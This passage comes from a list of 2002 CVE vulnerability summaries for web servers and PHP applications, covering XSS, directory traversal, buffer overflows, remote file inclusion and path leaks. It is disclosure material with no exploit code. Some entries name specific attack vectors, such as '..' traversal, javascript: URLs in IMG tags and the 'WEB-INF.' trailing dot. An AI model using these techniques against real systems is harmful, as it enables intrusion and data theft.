attackers to inject arbitrary web script or HTML via the num parameter. [CVE-2002-2293] Webshots Desktop screensaver allows local users to bypass the password on the screensaver by pressing CTRL-ALT-DELETE and (1) hitting the cancel button or (2) killing the screensaver from the task manager. [CVE-2002-2282] McAfee VirusScan 4.5.1, when the WebScanX.exe module is enabled, searches for particular DLLs from the user's home directory, even when browsing the local hard drive, which allows local users to run arbitrary code via malicious versions of those DLLs. [CVE-2002-2278] Cross-site scripting (XSS) vulnerability in mod_search/index.php in PortailPHP 0.99 allows remote attackers to inject arbitrary web script or HTML via the (1) $App_Theme, (2) $Rub_Search, (3) $Rub_News, (4) $Rub_File, (5) $Rub_Liens, or (6) $Rub_Faq variables. [CVE-2002-2273] Cross-site scripting (XSS) vulnerability in Webster HTTP Server allows remote attackers to inject arbitrary web script or HTML via the URL. [CVE-2002-2269] Directory traversal vulnerability in Webster HTTP Server allows remote attackers to read arbitrary files via a .. (dot dot) in the URL. [CVE-2002-2268] Buffer overflow in Webster HTTP Server allows remote attackers to execute arbitrary code via a long URL. [CVE-2002-2260] Cross-site scripting (XSS) vulnerability in the quips feature in Mozilla Bugzilla 2.10 through 2.17 allows remote attackers to inject arbitrary web script or HTML via the "show all quips" page. [CVE-2002-2256] Directory traversal vulnerability in pWins Webserver 0.2.5 and earlier allows remote attackers to read arbitrary files via Unicode characters. [CVE-2002-2255] Cross-site scripting (XSS) vulnerability in search.php in phpBB 2.0.3 and possibly earlier versions allows remote attackers to inject arbitrary web script or HTML via the search_username parameter in searchuser mode. [CVE-2002-2247] The administrator/phpinfo.php script in Mambo Site Server 4.0.11 allows remote attackers to obtain sensitive information such as the full web root path via phpinfo.php, which calls the phpinfo function. [CVE-2002-2246] Cross-site scripting (XSS) vulnerability in VisNetic Website before 3.5.15 allows remote attackers to inject arbitrary web script or HTML via the HTTP referer header (HTTP_REFERER) to a non-existent page, which is injected into the resulting 404 error page. [CVE-2002-2241] Buffer overflow in httpd32.exe in Deerfield VisNetic WebSite before 3.5.15 allows remote attackers to cause a denial of service (crash) via a long HTTP OPTIONS request. [CVE-2002-2231] Cross-site scripting (XSS) vulnerability in Ikonboard 3.1.1 allows remote attackers to inject arbitrary web script or HTML via (1) a javascript: URL in a photo URL or (2) an X-Forwarded-For: header. [CVE-2002-2230] Cross-site scripting (XSS) vulnerability in Ikonboard 3.1.1 allows remote attackers to inject arbitrary web script or HTML via a private message with a javascript: URL in the IMG tag, in which the URL ends in a ".gif" or ".jpg" string, a variant of CVE-2002-0328. [CVE-2002-2229] Directory traversal vulnerability in Sapio Design Ltd. WebReflex 1.53 allows remote attackers to read arbitrary files via a .. in an HTTP request. [CVE-2002-2217] Multiple PHP remote file inclusion vulnerabilities in Web Server Creator - Web Portal (WSC-WebPortal) 0.1 allow remote attackers to execute arbitrary PHP code via a URL in the (1) l parameter to customize.php or the (2) pg parameter to index.php. [CVE-2002-2216] Soft3304 04WebServer before 1.20 does not properly process URL strings, which allows remote attackers to obtain unspecified sensitive information. [CVE-2002-2205] Buffer overflow in Webresolve 0.1.0 and earlier allows remote attackers to execute arbitrary code by connecting to the server from an IP address that resolves to a long hostname. [CVE-2002-2201] The Printer Administration module for Webmin 0.990 and earlier allows remote attackers to execute arbitrary commands via shell metacharacters in the printer name. [CVE-2002-2193] Cross-site scripting (XSS) vulnerability in mojo.cgi for Mojo Mail 2.7 allows remote attackers to inject arbitrary web script via the email parameter. [CVE-2002-2192] Cross-site scripting (XSS) vulnerability in Perception LiteServe 2.0.1 allows remote attackers to execute arbitrary web script via (1) a Host: header when DNS wildcards are supported or (2) the query string in a "dir" request to indexed folders. [CVE-2002-2190] ArtsCore Studios CuteCast Forum 1.2 stores passwords in plaintext under the web document root, which allows remote attackers to obtain the passwords via an HTTP request to a .user file. [CVE-2002-2189] Cross-site scripting (XSS) vulnerability in ActiveXperts Software ActiveWebserver allows remote attackers to execute arbitrary web script via a link. [CVE-2002-2181] SonicWall Content Filtering allows local users to access prohibited web sites via requests to the web site's IP address instead of the domain name. [CVE-2002-2178] Cross-site scripting (XSS) vulnerability in article.php module for phpWebSite 0.8.3 allows remote attackers to execute arbitrary Javascript script via the sid parameter, as demonstrated using an IMG tag. [CVE-2002-2177] BEA WebLogic Server and Express 6.1 through 7.0.0.1 buffers HTTP requests in a way that can cause BEA to send the same response for two different HTTP requests, which could allow remote attackers to obtain sensitive information that was intended for other users. [CVE-2002-2171] Cross-site scripting (XSS) vulnerability in acWEB 1.8 and 1.14 allows remote attackers to insert arbitrary HTML and web script via a URL, possibly via a "%db" request in a URL. [CVE-2002-2170] Working Resources Inc. BadBlue Enterprise Edition 1.7 through 1.74 attempts to restrict administrator actions to the IP address of the local host, but does not provide additional authentication, which allows remote attackers to execute arbitrary code via a web page containing an HTTP POST request that accesses the dir.hts page on the localhost and adds an entire hard drive to be shared. [CVE-2002-2166] Cross-site scripting (XSS) vulnerability in FuseTalk 2.0 and 3.0 allows remote attackers to insert arbitrary HTML and web script. [CVE-2002-2165] The IMHO Webmail module 0.97.3 and earlier for Roxen leaks the REFERER from the browser's previous login session in an error page, which allows local users to read another user's inbox. [CVE-2002-2158] zenTrack 2.0.3 and earlier allows remote attackers to obtain the full path to the web root via an invalid ticket ID, which leaks the path in an error message. [CVE-2002-2152] The Czech edition of Software602's Web Server before 2002.0.02.0916 allows remote attackers to gain administrator privileges via direct HTTP requests to the /admin/ directory, which is not password protected. [CVE-2002-2149] Buffer overflow in Lucent Access Point 300, 600, and 1500 Service Routers allows remote attackers to cause a denial of service (reboot) via a long HTTP request to the administrative interface. [CVE-2002-2148] Lucent Ascend MAX Router 5.0 and earlier, Lucent Ascend Pipeline Router 6.0.2 and earlier and Lucent DSLTerminator allows remote attackers to obtain sensitive information such as hostname, MAC, and IP address of the Ethernet interface via a discard (UDP port 9) packet, which causes the device to leak the information in the response. [CVE-2002-2146] cgitest.exe in Savant Web Server 3.1 and earlier allows remote attackers to cause a denial of service (crash) via a long HTTP request. [CVE-2002-2145] Savant Web Server 3.1 and earlier allows remote attackers to bypass authentication for password protected user folders via a URL with a hex encoded space (%20) and a '.' (%2e) at the end of the filename. [CVE-2002-2144] Directory traversal vulnerability in BearShare 4.0.5 and 4.0.6 allows remote attackers to read files outside of the web root by hex-encoding the "/" (forward slash) or "." (dot) characters. [CVE-2002-2143] The admin.html file in MySimple News 1.0 stores its administrative password in plaintext, which allows remote attackers to gain unauthorized access to the web server by viewing the source of admin.html. [CVE-2002-2142] An undocumented extension for the Servlet mappings in the Servlet 2.3 specification, when upgrading to WebLogic Server and Express 7.0 Service Pack 1 from BEA WebLogic Server and Express 6.0 through 7.0.0.1, does not prepend a "/" character in certain URL patterns, which prevents the proper enforcement of role mappings and policies in applications that use the extension. [CVE-2002-2141] BEA WebLogic Server and Express 7.0 and 7.0.0.1, when running Servlets and Enterprise JavaBeans (EJB) on more than one server, will remove the security constraints and roles on all servers for any Servlets or EJB that are used by an application that is undeployed on one server, which could allow remote attackers to conduct unauthorized activities in violation of the intended restrictions. [CVE-2002-2134] haut.php in PEEL 1.0b allows remote attackers to execute arbitrary PHP code by modifying the dirroot parameter to reference a URL on a remote web server that contains the code in a lang.php file. [CVE-2002-2130] publish_xp_docs.php in Gallery 1.3.2 allows remote attackers to execute arbitrary PHP code by modifying the GALLERY_BASEDIR parameter to reference a URL on a remote web server that contains the code. [CVE-2002-2129] Cross-site scripting vulnerability (XSS) in editform.php for w-Agora 4.1.5 allows remote attackers to execute arbitrary web script via an arbitrary form field name containing the script, which is echoed back to the user when displaying the form. [CVE-2002-2125] Internet Explorer 6.0 does not warn users when an expired certificate authority (CA) certificate is submitted to the user and a newer CA certificate is in the user's local repository, which could allow remote attackers to decrypt web sessions via a man-in-the-middle (MITM) attack. [CVE-2002-2118] Buffer overflow in Blue World Lasso Web Data Engine 3.6.5 allows remote attackers to cause a denial of service via a long URL. [CVE-2002-2115] Cross-site scripting (XSS) vulnerability in Hyper NIKKI System (HNS) Lite before 0.9 and HNS before 2.10-pl2 allows remote attackers to inject arbitrary web script or HTML. [CVE-2002-2114] Artekopia Netjuke before 1.0 b7 allows remote attackers to execute arbitrary code on the web server, possibly via the section parameter, which is passed to an eval call. [CVE-2002-2112] RCA Digital Cable Modem DCM225 and DCM225E, and other modems that must conform to the Data-over-Cable Service Interface Specifications DOCSIS standard, uses the "public" community string for SNMP access, which allows remote attackers to read or write MIB information. [CVE-2002-2108] Unknown vulnerability in the "VAIO Manual" software in certain Sony VAIO personal computers sold from November 2001 to January 2002, allows remote attackers to modify data via a web page or HTML e-mail. [CVE-2002-2107] Cross-site scripting (XSS) vulnerability in the lookup script in Veridis OpenKeyServer (OKS) 1.2 allows remote attackers to inject arbitrary web script or HTML via the search parameter. [CVE-2002-2104] graph.php in Ganglia PHP RRD Web Client 1.0.2 allows remote attackers to execute arbitrary commands via the command parameter, which is provided to the passthru function. [CVE-2002-2095] Joe Testa hellbent 01 webserver allows attackers to read files that are specified in the hellbent.prefs file by creating a file with a similar name in the web root, as demonstrated using (1) index.webroot and (2) index.ipallow. [CVE-2002-2094] Joe Testa hellbent 01 allows remote attackers to determine the full path of the web root directory via a GET request with a relative path that includes the root's parent, which generates a 403 error message if the parent is incorrect, but a normal response if the parent is correct. [CVE-2002-2086] Multiple cross-site scripting (XSS) vulnerabilities in magicHTML of SquirrelMail before 1.2.6 allow remote attackers to inject arbitrary web script or HTML via (1) "<<script" in unspecified input fields or (2) a javascript: URL in the src attribute of an IMG tag. [CVE-2002-2085] Directory traversal vulnerability in page.cgi of WWWeBBB Forum 3.82 beta and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in an HTTP request. [CVE-2002-2074] SQL injection vulnerability in Mailidx before 20020105 allows remote attackers to execute arbitrary SQL commands via the search web page. [CVE-2002-2073] Cross-site scripting (XSS) vulnerability in the default ASP pages on Microsoft Site Server 3.0 on Windows NT 4.0 allows remote attackers to inject arbitrary web script or HTML via the (1) ctr parameter in Default.asp and (2) the query string to formslogin.asp. [CVE-2002-2065] WebCalendar 0.9.34 and earlier with 'browsing in includes directory' enabled allows remote attackers to read arbitrary include files with .inc extensions from the web root. [CVE-2002-2064] isadmin.php in PhpWebGallery 1.0 allows remote attackers to gain administrative access via by setting the photo_login cookie to pseudo. [CVE-2002-2062] Cross-site scripting (XSS) vulnerability in ftp.htt in Internet Explorer 5.5 and 6.0, when running on Windows 2000 with "Enable folder view for FTP sites" and "Enable Web content in folders" selected, allows remote attackers to inject arbitrary web script or HTML via the hostname portion of an FTP URL. [CVE-2002-2058] TeeKai Tracking Online 1.0 uses weak encryption of web usage statistics in data/userlog/log.txt, which allows remote attackers to identify IP's visiting the site by dividing each octet by the MD5 hash of '20'. [CVE-2002-2057] TeeKai Forum 1.2 uses weak encryption of web usage statistics in data/member_log.txt, which is stored under the web document root with insufficient access control, which allows remote attackers to identify IP's visiting the site by dividing each octet by the MD5 hash of '20'. [CVE-2002-2056] Cross-site scripting (XSS) vulnerability in TeeKai Forum 1.2 allows remote attackers to inject arbitrary web script or HTML via the valid_username_online cookie. [CVE-2002-2055] Cross-site scripting (XSS) vulnerability in userlog.php in TeeKai Tracking Online 1.0 allows remote attackers to inject arbitrary web script or HTML via the id parameter. [CVE-2002-2054] TeeKai Forum 1.2 allows remote attackers to authenticate as the administrator and and gain privileged web forum access by setting the valid_level cookie to admin. [CVE-2002-2053] The design of the Hot Standby Routing Protocol (HSRP), as implemented on Cisco IOS 12.1, when using IRPAS, allows remote attackers to cause a denial of service (CPU consumption) via a router with the same IP address as the interface on which HSRP is running, which causes a loop. [CVE-2002-2051] The processor_web plugin for ModLogAn 0.5.0 through 0.7.11, when used with the splitby option, allows local users to overwrite arbitrary files via a symlink attack on files specified as hostnames in a log file. [CVE-2002-2050] Directory traversal vulnerability in processor_web plugin for ModLogAn 0.5.0 through 0.7.11, when used with the splitby option, allows local users to overwrite arbitrary files via a .. (dot dot) in the hostname of a log entry. [CVE-2002-2045] x_stat_admin.php in x-stat 2.3 and earlier allows remote attackers to (1) execute PHP commands such as phpinfo or (2) obtain the full path of the web server via an invalid action parameter, which leaks the pathname in an error message. [CVE-2002-2044] Cross-site scripting (XSS) vulnerability in x_stat_admin.php in x-stat 2.3 and earlier allows remote attackers to inject arbitrary web script or HTML via a parameter to the phpinfo action. [CVE-2002-2024] Horde IMP 2.2.7 allows remote attackers to obtain the full web root pathname via an HTTP request for (1) poppassd.php3, (2) login.php3?reason=chpass2, (3) spelling.php3, and (4) ldap.search.php3?ldap_serv=nonsense which leaks the information in error messages. [CVE-2002-2021] Cross-site scripting (XSS) vulnerability in WoltLab Burning Board (wbboard) 1.1.1 allows remote attackers to inject arbitrary web script or HTML via the message parameter. [CVE-2002-2014] Lotus Domino 5.0.8 web server returns different error messages when a valid or invalid user is provided in HTTP requests, which allows remote attackers to determine valid user names and makes it easier to conduct brute force attacks. [CVE-2002-2011] Cross-site scripting (XSS) vulnerability in the fom CGI program (fom.cgi) in Faq-O-Matic 2.711 and 2.712 allows remote attackers to inject arbitrary web script or HTML via the file parameter. [CVE-2002-2010] Cross-site scripting (XSS) vulnerability in htsearch.cgi in htdig (ht://Dig) 3.1.5, 3.1.6, and 3.2 allows remote attackers to inject arbitrary web script or HTML via the words parameter. [CVE-2002-2009] Apache Tomcat 4.0.1 allows remote attackers to obtain the web root path via HTTP requests for JSP files preceded by (1) +/, (2) >/, (3) </, and (4) %20/, which leaks the pathname in an error message. [CVE-2002-2008] Apache Tomcat 4.0.3 for Windows allows remote attackers to obtain the web root path via an HTTP request for a resource that does not exist, such as lpt9, which leaks the information in an error message. [CVE-2002-2007] The default installations of Apache Tomcat 3.2.3 and 3.2.4 allows remote attackers to obtain sensitive system information such as directory listings and web root path, via erroneous HTTP requests for Java Server Pages (JSP) in the (1) test/jsp, (2) samples/jsp and (3) examples/jsp directories, or the (4) test/realPath.jsp servlet, which leaks pathnames in error messages. [CVE-2002-2005] Unknown vulnerability in Java web start 1.0.1_01, 1.0.1, 1.0 and 1.0.1.01 (HP-UX 11.x only) allows attackers to gain access to restricted resources via unknown attack vectors. [CVE-2002-1999] HP Praesidium Webproxy 1.0 running on HP-UX 11.04 VVOS could allow remote attackers to cause Webproxy to forward requests to the internal network via crafted HTTP requests. [CVE-2002-1996] Cross-site scripting (XSS) vulnerability in PostNuke 0.71 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) name parameter in modules.php and (2) catid parameter in index.php. [CVE-2002-1995] Cross-site scripting (XSS) vulnerability in phptonuke.php for PHP-Nuke allows remote attackers to inject arbitrary web script or HTML via the filnavn parameter. [CVE-2002-1994] advserver.exe in Advanced Web Server (AdvServer) Professional 1.030000 allows remote attackers to cause a denial of service via multiple HTTP requests containing a single carriage return/line feed (CRLF) sequence. [CVE-2002-1993] webbbs_post.pl in WebBBS 4 and 5.0 allows remote attackers to execute arbitrary commands via shell metacharacters in the followup parameter. [CVE-2002-1976] ifconfig, when used on the Linux kernel 2.2 and later, does not report when the network interface is in promiscuous mode if it was put in promiscuous mode using PACKET_MR_PROMISC, which could allow attackers to sniff the network without detection, as demonstrated using libpcap. [CVE-2002-1965] Cross-site scripting (XSS) vulnerability in Errors.gsl in Imatix Xitami 2.5b4 and 2.5b5 allows remote attackers to inject arbitrary web script or HTML via the (1) Javascript events, as demonstrated via an onerror event in an IMG SRC tag or (2) User-Agent field in an HTTP GET request. [CVE-2002-1960] Cross-site scripting (XSS) vulnerability in Cybozu Share360 1.1 allows remote attackers to inject arbitrary web script or HTML via an HTML link. [CVE-2002-1958] Cross-site scripting (XSS) vulnerability in kmMail 1.0, 1.0a, and 1.0b allows remote attackers to inject arbitrary web script or HTML via (1) javascript in onmouseover or other attributes in "safe" HTML tags such as the "b" tag, or (2) the Subject field. [CVE-2002-1954] Cross-site scripting (XSS) vulnerability in the phpinfo function in PHP 4.2.3 allows remote attackers to inject arbitrary web script or HTML via the query string argument, as demonstrated using soinfo.php. [CVE-2002-1951] Buffer overflow in GoAhead WebServer 2.1 allows remote attackers to execute arbitrary code via a long HTTP GET request with a large number of subdirectories. [CVE-2002-1950] Cross-site scripting (XSS) vulnerability in phpRank 1.8 allows remote attackers to inject arbitrary web script or HTML via the (1) the email parameter of add.php or (2) the banner URL (banurl parameter) in the main list. [CVE-2002-1949] The Network Attached Storage (NAS) Administration Web Page for Iomega NAS A300U transmits passwords in cleartext, which allows remote attackers to sniff the administrative password. [CVE-2002-1947] Webmin 0.21 through 1.0 uses the same built-in SSL key for all installations, which allows remote attackers to eavesdrop or highjack the SSL session. [CVE-2002-1941] Buffer overflow in RadioBird WebServer 4 Everyone 1.28 allows remote attackers to cause a denial of service (crash) via a long HTTP GET request with the Host header set. [CVE-2002-1931] Cross-site scripting (XSS) vulnerability in PHP Arena paFileDB 1.1.3 and 2.1.1 allows remote attackers to inject arbitrary web script or HTML via Javascript in the search string. [CVE-2002-1929] Cross-site scripting (XSS) vulnerability in pafiledb.php in PHP Arena paFileDB 1.1.3 through 3.0 allows remote attackers to inject arbitrary web script or HTML via the query string in the (1) rate, (2) email, or (3) download actions. [CVE-2002-1922] Cross-site scripting (XSS) vulnerability in global.php in Jelsoft vBulletin 2.0.0 through 2.2.8 allows remote attackers to inject arbitrary web script or HTML via the (1) $scriptpath or (2) $url variables. [CVE-2002-1921] The default configuration of MySQL 3.20.32 through 3.23.52, when running on Windows, does set the bind address to the loopback interface, which allows remote attackers to connect to the database. [CVE-2002-1912] SkyStream EMR5000 1.16 through 1.18 does not drop packets or disable the Ethernet interface when the buffers are full, which allows remote attackers to cause a denial of service (null pointer exception and kernel panic) via a large number of packets. [CVE-2002-1907] TelCondex SimpleWebServer 2.06.20817 allows remote attackers to cause a denial of service (crash) via a long HTTP GET request. [CVE-2002-1906] The web server for Polycom ViaVideo 2.2 and 3.0 allows remote attackers to cause a denial of service (CPU consumption) by sending incomplete HTTP requests and leaving the connections open. [CVE-2002-1905] Buffer overflow in the web server of Polycom ViaVideo 2.2 and 3.0 allows remote attackers to cause a denial of service (crash) via a long HTTP GET request. [CVE-2002-1901] Cross-site scripting (XSS) vulnerability in Bodo Bauer BBGallery 1.0 allows remote attackers to inject arbitrary web script or HTML via image tags. [CVE-2002-1900] Cross-site scripting (XSS) vulnerability in Pinboard 1.0 allows remote attackers to inject arbitrary web script or HTML via tasklists. [CVE-2002-1899] Cross-site scripting (XSS) vulnerability in IceWarp Web Mail 3.3.3 and 3.4.5 allows remote attackers to inject arbitrary web script or HTML via the "Full Name" (addressname) parameter. [CVE-2002-1897] MyWebServer LLC MyWebServer 1.0.2 allows remote attackers to cause a denial of service (crash) via a long HTTP request, possibly triggering a buffer overflow. [CVE-2002-1894] Cross-site scripting (XSS) vulnerability in viewtopic.php in phpBB 2.0.3 allows remote attackers to inject arbitrary web script or HTML via the highlight parameter. [CVE-2002-1893] Cross-site scripting (XSS) vulnerability in ArGoSoft Mail Server Pro 1.8.1.9 allows remote attackers to inject arbitrary web script or HTML via the e-mail message. [CVE-2002-1888] CommonName Toolbar 3.5.2.0 sends unqualified domain name requests to the CommonName organization and possibly other web servers for name resolution, which allows those organizations to obtain internal server names. [CVE-2002-1886] TightAuction 3.0 stores config.inc under the web document root with insufficient access control, which allows remote attackers to obtain the database username and password. [CVE-2002-1881] Macromedia Flash Player 4.0 r12 through 6.0.47.0 allows remote attackers to cause a denial of service (web browser crash) via malformed content in a Flash Shockwave (.SWF) file, as demonstrated by by ROT13 encoding the body of the file but not the headers. [CVE-2002-1877] NETGEAR FM114P allows remote attackers to bypass access restrictions for web sites via a URL that uses the IP address instead of the hostname. [CVE-2002-1870] Simple Web Server (SWS) 0.0.4 through 0.1.0 does not properly handle when the recv function call fails, which may allow remote attackers to overwrite program data or perform actions on an uninitialized heap, leading to a denial of service and possibly code execution. [CVE-2002-1866] Simple Web Server (SWS) 0.0.4 through 0.1.0 does not close file descriptors for 404 error messages, which could allow remote attackers to cause a denial of service (file descriptor exhaustion) via multiple requests for pages that do not exist. [CVE-2002-1864] Directory traversal vulnerability in Simple Web Server (SWS) 0.0.4 through 0.1.0 allows remote attackers to read arbitrary files via a ".." (dot dot) in an HTTP request. [CVE-2002-1861] Sybase Enterprise Application Server 4.0, when running on Windows, allows remote attackers to retrieve files in the WEB-INF directory, which contains Java class files and configuration information, via a request to the WEB-INF directory with a trailing dot ("WEB-INF."). [CVE-2002-1860] Pramati Server 3.0, when running on Windows, allows remote attackers to retrieve files in the WEB-INF directory, which contains Java class files and configuration information, via a request to the WEB-INF directory with a trailing dot ("WEB-INF."). [CVE-2002-1859] Orion Application Server 1.5.3, when running on Windows, allows remote attackers to retrieve files in the WEB-INF directory, which contains Java class files and configuration information, via a request to the WEB-INF directory with a trailing dot ("WEB-INF."). [CVE-2002-1858] Oracle Oracle9i Application Server 1.0.2.2 and 9.0.2 through 9.0.2.0.1, when running on Windows, allows remote attackers to retrieve files in the WEB-INF directory, which contains Java class files and configuration information, via a request to the WEB-INF directory with a trailing dot ("WEB-INF."). [CVE-2002-1857] jo! jo Webserver 1.0, when running on Windows, allows remote attackers to retrieve files in the WEB-INF directory, which contains Java class files and configuration information, via a request to the WEB-INF directory with a trailing dot ("WEB-INF."). [CVE-2002-1856] HP Application Server 8.0, when running on Windows, allows remote attackers to retrieve files in the WEB-INF directory, which contains Java class files and configuration information, via a request to the WEB-INF directory with a trailing dot ("WEB-INF."). [CVE-2002-1855] Macromedia JRun 3.0 through 4.0, when running on Windows, allows remote attackers to retrieve files in the WEB-INF directory, which contains Java class files and configuration information, via a request to the WEB-INF directory with a trailing dot ("WEB-INF."). [CVE-2002-1853] Cross-site scripting (XSS) vulnerability in MyNewsGroups 0.4 and 0.4.1 allows remote attackers to inject arbitrary web script or HTML via the subject of a newsgroup post, which is not properly handled by (1) myarticles.php, (2) search.php, (3) stats.php, or (4) standard.lib.php. [CVE-2002-1852] Cross-site scripting (XSS) vulnerability in Monkey 0.5.0 allows remote attackers to inject arbitrary web script or HTML via (1) the URL or (2) a parameter to test2.pl. [CVE-2002-1845] Cross-site scripting (XSS) vulnerability in index.php in Yet Another Bulletin Board (YaBB) 1.40 and 1.41 allows remote attackers to inject arbitrary web script or HTML via the password (passwrd) parameter. [CVE-2002-1834] The default configuration of Xerox DocuTech 6110 and DocuTech 6115 allows remote attackers to connect to the web server and (1) submit print jobs directly into the "print now" queue or (2) read the scanner job history. [CVE-2002-1829] Cross-site scripting (XSS) vulnerability in codeparse.php in Open Bulletin Board (OpenBB) 1.0.0 RC3 allows remote attackers to inject arbitrary web script or HTML via (1) myhome.php, (2) an onerror attribute in an IMG tag (a variant of CVE-2002-0330), or (3) a glow tag. [CVE-2002-1828] Savant Webserver 3.1 allows remote attackers to cause a denial of service (crash) via an HTTP GET request with a negative Content-Length value. [CVE-2002-1824] Microsoft Internet Explorer 6.0, when handling an expired CA-CERT in a webserver's certificate chain during a SSL/TLS handshake, does not prompt the user before searching for and finding a newer certificate, which may allow attackers to perform a man-in-the-middle attack. NOTE: it is not clear whether this poses a vulnerability. [CVE-2002-1822] IBM HTTP Server 1.0 on AS/400 allows remote attackers to obtain the path to the web root directory and other sensitive information, which is leaked in an error mesage when a request is made for a non-existent Java Server Page (JSP). [CVE-2002-1808] Cross-site scripting (XSS) vulnerability in Meunity Community System 1.1 allows remote attackers to inject arbitrary web script or HTML via Javascript in an IMG tag when creating a topic. [CVE-2002-1807] Cross-site scripting (XSS) vulnerability in phpWebSite 0.8.3 allows remote attackers to inject arbitrary web script or HTML via Javascript in an IMG tag. [CVE-2002-1806] Cross-site scripting (XSS) vulnerability in Drupal 4.0.0 allows remote attackers to inject arbitrary web script or HTML via Javascript in an IMG tag. [CVE-2002-1805] Cross-site scripting (XSS) vulnerability in DaCode 1.2.0 allows remote attackers to inject arbitrary web script or HTML via Javascript in an IMG tag. [CVE-2002-1804] Cross-site scripting (XSS) vulnerability in NPDS 4.8 allows remote attackers to inject arbitrary web script or HTML via Javascript in an IMG tag. [CVE-2002-1803] Cross-site scripting (XSS) vulnerability in PHP-Nuke 6.0 allows remote attackers to inject arbitrary web script or HTML via Javascript in an IMG tag. [CVE-2002-1802] Cross-site scripting (XSS) vulnerability in Xoops 1.0 RC3 allows remote attackers to inject arbitrary web script or HTML via Javascript in an IMG tag when submitting news. [CVE-2002-1801] ImageFolio 2.23 through 2.27 allows remote attackers to obtain sensitive information via a nonexistent image category, which leaks the web root in the resulting error message. [CVE-2002-1799] Cross-site scripting (XSS) vulnerability in phpRank 1.8 allows remote attackers to inject arbitrary web script or HTML via the (1) email parameter to add.php or (2) banurl parameter. [CVE-2002-1795] Cross-site scripting (XSS) vulnerability in connect.asp in Microsoft Terminal Services Advanced Client (TSAC) ActiveX control allows remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2002-1785] Cross-site scripting (XSS) vulnerability in Zeus Administration Server in Zeus Web Server 4.0 through 4.1r2 allows remote authenticated users to inject arbitrary web script or HTML via the section parameter to index.fcgi. [CVE-2002-1780] BPM Studio Pro 4.2 by ALCATech GmbH includes a webserver that allows a remote attacker to cause a denial of service (crash) by sending a URL request for a MS-DOS device such as con. NOTE: it has been disputed that this and possibly other application-level DOS device issues stem from a bug in Windows, and as such, such applications should not be considered vulnerable themselves. [CVE-2002-1733] Cross-site scripting (XSS) vulnerability in the web-based message board in Prospero Technologies allows remote attackers to inject arbitrary web script or HTML via a message board post. [CVE-2002-1732] Multiple cross-site scripting (XSS) vulnerabilities in Actinic Catalog 4.7.0 allow remote attackers to inject arbitrary web script or HTML via (1) the query string argument to certain .pl files, (2) the REFPAGE parameter to ca000007.pl, (3) PRODREF parameter to ss000007.pl, or (4) hop parameter to ca000001.pl. [CVE-2002-1729] Cross-site scripting vulnerability (XSS) in ASPjar Guestbook 1.00 allows remote attackers to execute arbitrary script as other users via the "web site" parameter in a guestbook message. [CVE-2002-1728] askSam Web Publisher 1.0 and 4.0 allows remote attackers to determine the full path to the web root directory via a request for a file that does not exist, which generates an error message that reveals the full path. [CVE-2002-1727] Cross-site scripting vulnerability (XSS) in (1) as_web.exe and (2) as_web4.exe in askSam Web Publisher 1 and 4 allows remote attackers to execute arbitrary script as other users via a URL. [CVE-2002-1710] The attachment capability in Compose Mail in BasiliX Webmail 1.1.0 does not check whether the attachment was uploaded by the user or came from a HTTP POST, which could allow local users to steal sensitive information like a password file. [CVE-2002-1709] SQL injection vulnerability in BasiliX Webmail 1.10 allows remote attackers to obtain sensitive information or possibly modify data via the id variable. [CVE-2002-1708] Cross-site scripting vulnerability (XSS) in BasiliX Webmail 1.10 allows remote attackers to execute arbitrary script as other users by injecting script into the (1) subject or (2) message fields. [CVE-2002-1707] install.php in phpBB 2.0 through 2.0.1, when "allow_url_fopen" and "register_globals" variables are set to "on", allows remote attackers to execute arbitrary PHP code by modifying the phpbb_root_dir parameter to reference a URL on a remote web server that contains the code. [CVE-2002-1706] Cisco IOS software 11.3 through 12.2 running on Cisco uBR7200 and uBR7100 series Universal Broadband Routers allows remote attackers to modify Data Over Cable Service Interface Specification (DOCSIS) settings via a DOCSIS file without a Message Integrity Check (MIC) signature, which is approved by the router. [CVE-2002-1704] Zeroboard 4.1, when the "allow_url_fopen" and "register_globals" variables are enabled, allows remote attackers to execute arbitrary PHP code by modifying the _zb_path parameter to reference a URL on a remote web server that contains the code. [CVE-2002-1680] Cross-site scripting (XSS) vulnerability in CGI Online Worldweb Shopping 1.1 (a.k.a. COWS) allows remote attackers to execute arbitrary script as other users by injecting script into (1) diagnose.cgi or (2) compatible.cgi. [CVE-2002-1677] 14all.cgi 1.1p15 in mrtgconfig allows remote attackers to determine the physical path to the web root directory via a request with an invalid cfg parameter, which generates an error message that reveals the path. [CVE-2002-1672] Webmin 0.92, when installed from an RPM, creates /var/webmin with insecure permissions (world readable), which could allow local users to read the root user's cookie-based authentication credentials and possibly hijack the root user's session using the credentials. [CVE-2002-1655] The Web Publishing feature in Netscape Enterprise Server 3.x and iPlanet Web Server 4.x allows remote attackers to cause a denial of service (crash) via a wp-html-rend request. [CVE-2002-1654] iPlanet Web Server Enterprise Edition and Netscape Enterprise Server 4.0 and 4.1 allows remote attackers to conduct HTTP Basic Authentication via the wp-force-auth Web Publisher command, which provides a distinct attack vector and may make it easier to conduct brute force password guessing without detection. [CVE-2002-1651] Cross-site scripting (XSS) vulnerability in Verity Search97 allows remote attackers to insert arbitrary web content and steal sensitive information from other clients, possibly due to certain error messages from template pages that use the (1) vformat or (2) vfilter functions. [CVE-2002-1647] The quick login feature in Slash Slashcode does not redirect the user to an alternate URL when the wrong password is provided, which makes it easier for remote web sites to guess the proper passwords by reading the username and password from the Referrer URL. [CVE-2002-1641] Multiple buffer overflows in Oracle Web Cache for Oracle 9i Application Server (9iAS) allow remote attackers to execute arbitrary code via unknown vectors. [CVE-2002-1640] Multiple cross-site scripting (XSS) vulnerabilities in Oracle Configurator before 11.5.7.17.32 and 11.5.6.16.53 allows remote attackers to inject arbitrary web script or HTML via (1) Text Features in the DHTML UI or (2) the test parameter to the oracle.apps.cz.servlet.UiServlet servlet. [CVE-2002-1636] Cross-site scripting (XSS) vulnerability in the htp PL/SQL package for Oracle 9i Application Server (9iAS) allows remote attackers to inject arbitrary web script or HTML via the cbuf parameter to htp.print. [CVE-2002-1634] Novell NetWare 5.1 installs sample applications that allow remote attackers to obtain sensitive information via (1) ndsobj.nlm, (2) allfield.jse, (3) websinfo.bas, (4) ndslogin.pl, (5) volscgi.pl, (6) lancgi.pl, (7) test.jse, or (8) env.pl. [CVE-2002-1625] Macromedia Flash Player 6 does not terminate connections when the user leaves the web page, which allows remote attackers to cause a denial of service (bandwidth, resource, and CPU consumption) via the (1) loadMovie or (2) loadSound commands, which continue to execute until the browser is closed. [CVE-2002-1624] 